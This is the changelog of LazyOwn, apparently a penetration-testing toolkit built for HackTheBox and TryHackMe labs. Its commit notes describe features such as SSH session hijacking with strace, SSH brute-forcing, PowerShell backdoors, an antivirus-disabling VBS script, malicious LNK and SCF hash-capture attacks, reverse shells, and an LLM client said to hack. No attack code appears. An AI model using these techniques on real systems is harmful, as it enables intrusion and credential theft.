    • test(deleted files): index.sh y dump_readme.sh Version: release/0.1.6 se eliminana estos archivos para limpiar un poco de scripts el directorio principal - README.md - docs/README.html - docs/index.html - docs/index.html.bak - dump_readme.sh - index.sh LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 23:55:59 2024 -0400 Hora: 1723780559



    • refactor(refactor DEPLOY, sessionstrace): se crea todo en un solo archivo deploy y se eliminaran en el proximo commit index.sh ydump_readme.sh Version: release/0.1.6 el ataque ahora es capaz de generar una salida en el directorio sessions/strace.txt y muestra una salida bastante legible, mucho mas que la primera poc - COMMANDS.md - DEPLOY.sh - README.md - UTILS.md - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - lazyown - utils.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 20:15:03 2024 -0400 Hora: 1723767303



    • feature(sessionssh y sessionsshstrace): nuevos comandos documentados en COMMANDS.md Version: release/0.1.6 genera un ataque de secuetro de proceso con strace permitiendo observar la session ssh commandos, y salida de los comandos - COMMANDS.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 19:06:13 2024 -0400 Hora: 1723763173



    • test(testing Changelog): new method to create changelog Version: release/0.1.5 testing this method - CHANGELOG.md - DEPLOY.sh - README.md - docs/README.html - docs/index.html LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 18:43:06 2024 -0400 Hora: 1723761786

Nuevas características


    • feat(lazyscripts): se crea el comando y el directorio lazyscripts el cual recive como parametro un nombre de chivo Version: release/0.1.5 ese archivo debe estar en el direcorio lazyscripts estos archivos cuentan con comandos que seran ejecutados en batch :) - COMMANDS.md - README.md - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 18:16:02 2024 -0400 Hora: 1723760162



    • feature(nuevos recursos, comandos, archivos tool para pwntomate): se cargan nuevas herramientas para download_external, nuevos comandos documentados en coomands.md, y nuevos archivos tools para pwntomate Version: release/0.1.4 tools, medusa, hydra, ssh, rdp, comandos nuevos portdiscover, portservicesdiscover, y hostdiscover, y una honeypot espectacular, junto a usernanarchy tremenda tool para generar nombres de usuario segun los parametros pasdos - COMMANDS.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak - external/install_external.sh - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 05:24:29 2024 -0400 Hora: 1723713869

Nuevas características


    • feat(tool): nuevo tool a pwntomate medusa.tool Version: release/0.1.3 automatiza puertos ssh - README.md - docs/README.html - docs/index.html - docs/index.html.bak - payload.json LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 05:15:06 2024 -0400 Hora: 1723713306

Nuevas características


    • feat(medusa): nueco comando Version: release/0.1.2 para crackear servicios ssh - COMMANDS.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak - lazyown LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 04:31:53 2024 -0400 Hora: 1723710713



    • docs(changelog): reload Version: release/0.1.1 deleted - CHANGELOG.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 04:30:41 2024 -0400 Hora: 1723710641



    • docs(history): reload the history deleted by error holly git :P Version: release/0.1.1 - CHANGELOG.md - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:54:04 2024 -0400 Hora: 1723708444



    • fix(fix): fix Version: release/0.1.1 fix - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:50:40 2024 -0400 Hora: 1723708240



    • fix(fix): versionamiento Version: - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:44:46 2024 -0400 Hora: 1723707886



    • fix(fix): fix en los tags Version: - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:40:26 2024 -0400 Hora: 1723707626



    • fix(version file): Version: - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:37:59 2024 -0400 Hora: 1723707479



    • fix(pandoc): command Version: bad arguments - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:36:55 2024 -0400 Hora: 1723707415



    • fix(fix): changelog Version: :D - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:31:11 2024 -0400 Hora: 1723707071



    • fix(fixing): fixin bug in formating of changelog Version: :D - DEPLOY.sh - README.md - docs/README.html - docs/index.html LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:26:33 2024 -0400 Hora: 1723706793



    • fix(fixing): fixing semantic version Version: implemented - DEPLOY.sh - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:20:20 2024 -0400 Hora: 1723706420

Nuevo Release


    • release(release): tipo release Version: probandoe l tipo release - README.md - docs/README.html - docs/index.html - docs/index.html.bak LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:19:32 2024 -0400 Hora: 1723706372

Correcciones urgentes


    • hotfix(error en parametro): deploy en el pandocpara generar documento de changelog Version: release/0.1.0 limieza de changelog - DEPLOY.sh - README.md - docs/README.html - docs/index.html LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 03:18:04 2024 -0400 Hora: 1723706284

Nuevas características


    • feat(cambio en el versionamiento semantico): se agregan release y patch Version: al workflow - DEPLOY.sh - README.md - docs/COMMANDS.html - docs/README.html - docs/UTILS.html - docs/index.html - docs/index.html.bak - readmeneitor.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:57:20 2024 -0400 Hora: 1723705040

Nuevo parche


    • patch(patching): prueba de nuevos tipos de commits Version: en este caso patch - DEPLOY.sh - docs/index.html.bak - readmeneitor.py LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:34:57 2024 -0400 Hora: 1723703697



    • test(testind): deploy Version: release/0.1.0 test LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:31:42 2024 -0400 Hora: 1723703502

Nuevas características


    • feat(semantic versioning): se implementa el versionamiento semantico utilizando el archivo versions.json y git en el archivo DEPLOY.sh Version: release/0.1.0 - la version es cargada desde git y depositada en el json, este json se utiliza para mostrar la version en el script LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 02:01:01 2024 -0400 Hora: 1723701661



    • fix(firma de commits con pgp): cree una firmita gpg para firmar los commits Version: release/0.0.14 :D LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:52:52 2024 -0400 Hora: 1723701172



    • feature(test): testing deploy feature and semantic versioning Version: release/0.1.0 - testing versioning to release/0.0.14 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:50:07 2024 -0400 Hora: 1723701007



    • test(deploy): testing deploy script Version: release/0.0.13 testing semantic versioning LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:47:24 2024 -0400 Hora: 1723700844

Correcciones urgentes


    • hotfix(bug in Deploy): not updated the index.html file in deploys Version: release/0.0.14 - changed scripts index.sh and dump_readme.sh and DEPLOY.sh LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 01:31:04 2024 -0400 Hora: 1723699864



    • feature(mejoras y fixes): - se agrega un pequeño diccionario en el comando hydra, se mejroa el comando clean, se arreglan algunos bugs Version: release/0.1.0 - se agregan colorines al testmeneitor.py para ahcer check visual, mejoras en el comando vpn, en el script fast_run_as_r00t.sh, todo docuemntado en README.md LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Thu Aug 15 00:13:04 2024 -0400 Hora: 1723695184

Nuevas características


    • feat(add scripts): - adding scripts on sessions/win directory a nc ps1 version Version: release/0.1.0 - 2 backdoors in ps1 i found in a machine in tryhackme xD LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 23:31:15 2024 -0400 Hora: 1723692675



    • docs(add README.html to anchor tag in menu of index.html): - chenges in index.html in line 162 Version: release/0.0.13 added the line in li with anchor tag LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 23:25:51 2024 -0400 Hora: 1723692351



    • docs(mejora documentaciòn): se completan varios comandos con descripciones pobres Version: release/0.0.13 se mueve el archivo READEME.html que se genera automaticamente a docs/ LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 23:00:31 2024 -0400 Hora: 1723690831



    • feature(cambios en script fast_run_as_r00t.sh): se agrega la opción –vpn para poder elegir parametricamente que vpn se elije para la ejecucion Version: release/0.1.0 se agregan metodos de control en el flujo de los comandos como la salida de SIGNAL CONTROL + D LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 18:20:13 2024 -0400 Hora: 1723674013



    • docs(test): bad tabs in index.html Version: release/0.0.13 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 18:06:45 2024 -0400 Hora: 1723673205



    • docs(cambio en index.html): tabulacion incorrecta del banner Version: release/0.0.13 corregido :D LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 18:01:05 2024 -0400 Hora: 1723672865



    • refactor(refactor): se cambia el nombre de readme.sh a dump_readme.sh para que no moleste cuando se escriba ./run junto al tab Version: release/0.0.13 prueba de que todo quede bien LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:45:42 2024 -0400 Hora: 1723671942



    • test(test): test Version: release/0.0.13 test LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:38:56 2024 -0400 Hora: 1723671536



    • feature(actualizador de readme.md): con los nuevos cambios desde los scripts que generan documentaciòn Version: release/0.1.0 y prueba de deplsiegue LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:27:23 2024 -0400 Hora: 1723670843



    • test(test): new styles in html of documentation Version: release/0.0.13 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:06:21 2024 -0400 Hora: 1723669581



    • test(test): testing changelog Version: release/0.0.13 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 17:03:41 2024 -0400 Hora: 1723669421



    • test(testing): new changelog format Version: release/0.0.13 new template LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:56:07 2024 -0400 Hora: 1723668967



    • test(test): Version: release/0.0.13 test LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:55:32 2024 -0400 Hora: 1723668932



    • test(testeando): nuevo changelog Version: release/0.0.13 mejor formateado LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:47:49 2024 -0400 Hora: 1723668469



    • test(test): deploy Version: release/0.0.13 changes in changelog LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:35:12 2024 -0400 Hora: 1723667712



    • test(testing): changelog Version: release/0.0.13 saltos de linea LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:34:08 2024 -0400 Hora: 1723667648



    • test(tesing): saltos de linea en commit Version: release/0.0.13 :) LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ Fecha: Wed Aug 14 16:28:47 2024 -0400 Hora: 1723667327



    • docs(class=“neon-text” on ul): :): release/0.0.13:)LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ : Wed Aug 14 15:57:39 2024 -0400 - Hora: 1723665459



    • test(commits con fecha y hora :P): probando el despliegue: release/0.0.13fechasLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/ : Wed Aug 14 15:52:12 2024 -0400 - Hora: 1723665132



    • test(test de index.html): testeando el despliegue automatizado del sitio web de LazyOwn: release/0.0.13://grisuno.github.io/LazyOwn/LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/



    • test(test index.sh): se realizan cambios en index.sh: release/0.0.13cambios realizan cambios en index.html con un nuevo sistema de plantillasLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/



    • test(testing): Testeando el flujo de trabajo en los despliegues automatizados.: release/0.0.13el nuevi versionamientoLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/



    • feature(versionamiento semantico en script de deploy): mejora en DEPLOY.sh con versionamiento semantico: release/0.1.0vrsionamiento semantico en el script de depsliegueLazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 LazyOwn/ https://grisuno.github.io/LazyOwn/



    • test(test of –no-test): and lolcat on clock command :Phas now alias👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • docs(se agrega el change log al readme): tambien se ejecutan pruebas del despliegue con el parametro –no-testhechos solo en el archivo README.md👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/

Correcciones urgentes


    • hotfix(fix in vpn): dont work with argumentsworks xD👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • feature(parametrizar el despliegue): se agrega el parametro –no-test para despliegues que no involucren cambios en la tool:D👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • test(troubleshooting): deleting the tmp file but i cant sleep👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/

Correcciones urgentes


    • hotfix(delete qa command to option -c): bug: dont let beggin scriptfast_run_as_r00t.sh, instruction was deletedline 6678👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • test(despliegue): backup file del archivo lazyown creado en las pruebas TODO: eliminar el archivo al terminar las pruebas, ahora toca saber donde lo està creadno son muchas funciones xD, aun que creoq ue es mi pequeño burpfuzzer que lo hace pero ya es tardeno lo veré hoy👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • test(despliegue): de organizaciòn de archivos ovpn dentro del directorio vpnse actualizo el timeout de las pruebas unitarias👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • test(testmeneitor): probando el workflow de desplieguees el body de la prueba de despliegue junto a testmineitor👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • feature(nuevo creador de index.html): crea el html de manera automatizada con el script index.shscript realiza tareas de actualizaciòn de la pagina web👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • feature(mejora CHANGELOG.sh): ahora actualiza usando readmeneitor.pyutilizarà nuestro testmeneitor para probar que no subimos codigo con bugs👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/

Nuevas características


    • feat(mejorando el tipo): cambio en el script CHANGELOG.shmejora la descripcion de los tipos de commits👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • docs(docs): El cierre de una imagen en la documentación estaba mal :)se modifico el CHANGELOG.sh que chulada de script👽 LazyOwn on HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 https://www.reddit.com/r/LazyOwn/ 👽 https://grisuno.github.io/LazyOwn/



    • Nueva descripcion en el readme y probando el CHANGELOG.sh :)



    • ahora el changelog a docs :D en formato html



    • HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 Ahora estamos en TryHackMe :D, nuestro QA Testmeneitor.py ya es màs inteligente ya no se le olvida cerrar las tareas que abrio xD, todos los comandos nuevos estan docuemntados en docs/COMMANDS.md y docs/UTILS.md todas las funciones nuevas como copy2clip :P, y estrenamos CHANGELOG.md y CHANGELOG.sh :D 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 some changes in the web pandoc README.md -f markdown -t html -s -o README.html madremia que comandazo 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 some changes in the web pandoc README.md -f markdown -t html -s -o README.html madremia que comandazo 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 some changes in the web 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 comming soon tryhackme 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 testmeneitor.py my new qa it’s new doing qa so… l:P, some commands news base64encode, base64decode, rdp, all documented by my documentator readmeneitor.py :P 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new fancy proompt :) 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 bug fixing 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 3ast3r366 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New commands documented at COMMANDS.md and new ultis documented at ULTIS.md 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New commands documented at COMMANDS.md and new ultis documented at ULTIS.md 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New commands documented at COMMANDS.md and new ultis documented at ULTIS.md 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New command launchpad to recon Linux OS 👽



    • Merge pull request #27 from grisuno/clcthulhu-patch-1



    • docs(update readme description): change of the description; Update README.md



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New Machine, New Session, New Look, New functions, New tools, New CVEs, NEW VERSION 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 mejorando la documentaciòn 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new commands rulencode, urldecode, y lynis documented at COMMANDS.md 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 command vpn now handle multiple ovpn files 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 command vpn now handle multiple ovpn files 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new commands documented at COMMANDS.md, now implement autocomplete at hashcat, more soon :) 👽



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 new commands documented at COMMANDS.md



    • 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 Magicgardens is so insane but pwned :)



    • 👽 new commands documented in COMMANDS.md or README.md and more documentation of the proyect thanks to readmineitor.py :D comming soon their own repo…



    • 👽 new commands documented in COMMANDS.md or README.md and more documentation of the proyect thanks to readmineitor.py :D comming soon their own repo…



    • 👽 new machine magic gardens insane machine because resource was pwned and sea not was released yet



    • 👽 bug fixing in createhash, new wrappers, chisel command updated now can choice the payload, img2cookie new payloads



    • 👽 bug fixing in createhash, new wrappers, chisel command updated now can choice the payload, img2cookie new payloads



    • 👽 some love to readme



    • 👽 some love to readme



    • 👽 some love to readme



    • 👽 new tools for pwntomate :D



    • 👽 new command img2cookie :)



    • 👽 new command img2cookie :)



    • 👽 new machine comprezzor.htb



    • 👽 new script readmeneitor req updated



    • 👽 new script readmeneitor to help me update the readme xD



    • 👽 new command ssh 22 and if u have file sessions/credentials.txt this will open ssh conection :)



    • 👽 bug fixing and replace command nc with pwncatcs more fancy and sharp :)



    • 👽 bug fixing in wfuzz sub command wen you not pass the domain



    • 👽 some changes in nmap script now discovery have template html too and we have a little index2.html to navigate the reports.



    • 👽 some littles changes :)



    • 👽 new machine compiled :)



    • 👽 new command disableav to create a aav.vbs to disable av if it’s possible :)



    • 👽 changing the command in venom :)



    • 👽 holly jissus mist.htb now pwned with my user :P its rally insane amount of work to pwn



    • 👽 holly jissus mist.htb machine cost to me one week and my mental health xD bu it’s pwned xD



    • 👽 todo readme …



    • Update README.md



    • 👽 update gitignore …



    • 👽 chisel fix copy to clipboard commad bug …



    • 👽 command list to update the readme: todo …



    • 👽 no more prints ( 👽 we have 13 xD) now we have technologì we have print_msg, print_error & print_warn :) so much pretty



    • Update README.md



    • Update README.md



    • Update README.md



    • Update README.md



    • 👽 better prints 👽



    • 👽 conptyshell better 👽



    • 👽 new brothers commands, LazyOwn> winbase64payload and asprevbase64 👽



    • some roder to prints, not finished yet but the storm its cut the electricity so commit….



    • feat: somo testing and alias now you can run gpt alias :D



    • feat: Now the GPT Client use Llama 70B and now can hack :) fixing error path from json files :P



    • feat: Now the GPT Client use Llama 70B and now can hack :)



    • feat: more time to the nmap to finished and pyautomate autostart



    • feat: New stylesheet for Nmap reports, making them more professional and including links to CVEs according to the version of banner services and supper fast automate auto run script as fast_run_as_r00t.sh, demo soon



    • Create sessions.sh



    • some new attacks exploits and new menu to download resources and exploits :D new msf autoroute :D



    • some new attacks exploits and new menu to download resources adn exploits :D



    • some new attacks



    • some ideas



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 command smbserver now create file.scf to generate a attackto the victim try to charge an iccon from our smbserver and the hash is ours



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command getnpusers



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 the target was pwntomated 🍅 alias auto.



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 the target was pwntomated 🍅 alias auto.



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 the target was pwntomated 🍅. jejejjejej



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 now with pwntomate to automate with the command pyautomate



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 now command nmap or run lazynmap has a html and xml reports to more pleasssure. xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command chisel to run chisel as server before run download_resource command



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 socat command to use proxychains :D and better msf rev now with argument [win|win64|lin|lin64|mac|mac64] and command msf lnk [win|win64] to perform a malicious shortcut lnk attack with msfvenom



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 some format….



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 …



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 fix arguments little bug



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 fix arguments little bug



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new arguments :) -c command ex ping



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new aliases :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 now options like –help, -v and –no-banner :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command clock to see the time of the eternal now :) now in white xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command clock to see the time of the eternal now :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429



    • HackTheBox https://app.hackthebox.com/teams/overview/6429



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 newhashcat



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new comands conptyshell better command nc noew with tty treatment createhash better now with recognice automate download_resource



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 another account and i noob again bu i steel playing insane mist machine and if not unban so i can unlck my writeups and spoiler spoiler spoiler alert xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 was banned from htb to spoiler jajjajaj xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 msf command



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to try attac cammeras not work with my cammera yet xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to try attac cammeras not work with my cammera yet xD



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new commands ignorearp ignoreicmp acknowledgearp acknowledgeicmp ports cports



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 clean command to clean up the mess and pwn the next machine :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz commands pwd, sh



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz command now search subdomains with wfuzz sub domain.htb new commands nc, vpn, rev, banner :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 New Colors :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 adding run script to run lazyown with virtual env activated to avoid errors



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 adding alias to exit as q :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 adding alias to commands its una shulada



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 some love to list command :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 some love in form of colored strings :D



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 some love to some prints :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new command py3ttyup to upgrade to tty your rev shell :)



    • HackTheBox https://app.hackthebox.com/teams/overview/6429 new commands ip www to show ips and start webserver at sessions directory where lazyown dump scripts like revertshells, webshells, etc. and some fixperms :)



